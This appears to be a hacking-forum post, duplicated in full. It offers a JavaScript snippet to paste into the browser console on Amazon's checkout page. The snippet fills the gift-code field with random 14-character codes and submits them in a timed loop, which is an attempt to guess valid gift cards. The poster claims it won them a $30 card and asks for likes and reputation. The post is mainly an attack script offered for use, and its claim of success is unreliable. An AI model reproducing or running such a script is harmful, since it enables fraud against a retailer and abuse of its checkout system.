ltrain2018
Container Vulnerability Auditor
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
Alright so this is a script for amazon I got a 30 dollar gift card once but thats about
Likes and rep appreciated
Steps:
Go to amazon checkout
click giftcode option
inspect element
click consle tab
Paste this code into Consle
var speed = prompt("Type 1,000 if your PC is fast, 500 for a slow pc")
function makeid() {
var text = "";
var possible = "6SJXEoQ0Htx4WhvKgu2b3fIrle8wBZs1MRpT9PGyDCLVUmYO5AdiankFc7qjzN"; //you can edit this to your own generation code
for (var i = 0; i < 14; i++)
text += possible.charAt(Math.floor(Math.random() * possible.length));
return text;
}
function main() {
document.getElementById("gcpromoinput").value = makeid();
document.getElementById("button-add-gcpromo").click();
}
setInterval(function() {
main();
}, speed);
Edited by Ilikelean, 07 September 2018 - 02:03 AM.
Likes and rep appreciated
Steps:
Go to amazon checkout
click giftcode option
inspect element
click consle tab
Paste this code into Consle
var speed = prompt("Type 1,000 if your PC is fast, 500 for a slow pc")
function makeid() {
var text = "";
var possible = "6SJXEoQ0Htx4WhvKgu2b3fIrle8wBZs1MRpT9PGyDCLVUmYO5AdiankFc7qjzN"; //you can edit this to your own generation code
for (var i = 0; i < 14; i++)
text += possible.charAt(Math.floor(Math.random() * possible.length));
return text;
}
function main() {
document.getElementById("gcpromoinput").value = makeid();
document.getElementById("button-add-gcpromo").click();
}
setInterval(function() {
main();
}, speed);
Edited by Ilikelean, 07 September 2018 - 02:03 AM.